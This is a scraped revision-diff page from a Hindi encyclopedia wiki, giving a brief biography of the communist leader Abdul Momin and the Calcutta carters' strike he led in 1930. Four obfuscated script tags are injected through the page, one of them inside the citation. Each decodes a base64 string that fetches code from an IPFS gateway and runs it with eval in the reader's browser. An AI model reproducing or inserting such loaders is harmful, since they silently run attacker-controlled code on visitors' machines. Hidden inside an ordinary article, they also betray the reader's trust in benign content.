Difference between revisions of "अब्दुल मोमिन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*अब्दुल मोमिन एक कम्युनिस्ट नेता था। *कलकत्ता में [[...' के साथ नया पन्ना बनाया)
 
m (Text replacement - "विरूद्ध" to "विरुद्ध")
 
Line 1: Line 1:
 
*अब्दुल मोमिन एक कम्युनिस्ट नेता था।  
 
*अब्दुल मोमिन एक कम्युनिस्ट नेता था।  
 
*[[कलकत्ता]] में [[सविनय अवज्ञा आन्दोलन]] के ठीक पहले (अप्रैल, 1930 ई. में) अब्दुल मोमिन ने गाड़ी वालों की एक अत्यन्त सफल हड़ताल का नेतृत्व किया था।  
 
*[[कलकत्ता]] में [[सविनय अवज्ञा आन्दोलन]] के ठीक पहले (अप्रैल, 1930 ई. में) अब्दुल मोमिन ने गाड़ी वालों की एक अत्यन्त सफल हड़ताल का नेतृत्व किया था।  
*इस हड़ताल का आयोजन तीसरे पहर सामान ढोने पर लगाए गए प्रतिबन्ध के विरूद्ध किया गया था।  
+
*इस हड़ताल का आयोजन तीसरे पहर सामान ढोने पर लगाए गए प्रतिबन्ध के विरुद्ध किया गया था।  
 
*इसके अन्तर्गत शहर की सड़कों पर गाड़ियों को खड़ाकर यातायात रोक दिया गया, जिससे प्रशासन को अत्यधिक परेशानी हुईं।  
 
*इसके अन्तर्गत शहर की सड़कों पर गाड़ियों को खड़ाकर यातायात रोक दिया गया, जिससे प्रशासन को अत्यधिक परेशानी हुईं।  
 
*मोमिन जीवन भर श्रमिकों के हितों की रक्षा के लिए संघर्षरत रहे तथा इस दौरान उन्हें कुछ बार जेल भी जाना पड़ा।
 
*मोमिन जीवन भर श्रमिकों के हितों की रक्षा के लिए संघर्षरत रहे तथा इस दौरान उन्हें कुछ बार जेल भी जाना पड़ा।

Latest revision as of 15:26, 17 October 2015

  • abdul momin ek kamyunist neta tha.
  • kalakatta mean savinay avajna andolan ke thik pahale (aprail, 1930 ee. mean) abdul momin ne ga di valoan ki ek atyant saphal h datal ka netritv kiya tha.
  • is h datal ka ayojan tisare pahar saman dhone par lagae ge pratibandh ke viruddh kiya gaya tha.
  • isake antargat shahar ki s dakoan par ga diyoan ko kh dakar yatayat rok diya gaya, jisase prashasan ko atyadhik pareshani hueean.
  • momin jivan bhar shramikoan ke hitoan ki raksha ke lie sangharsharat rahe tatha is dauran unhean kuchh bar jel bhi jana p da.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

nagori, d aau. es.el. “khand 3”, svatantrata senani kosh (gaandhiyugin), 2011 (hindi), bharatadiskavari pustakalay: gitaanjali prakashan, jayapur, prishth san 13.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>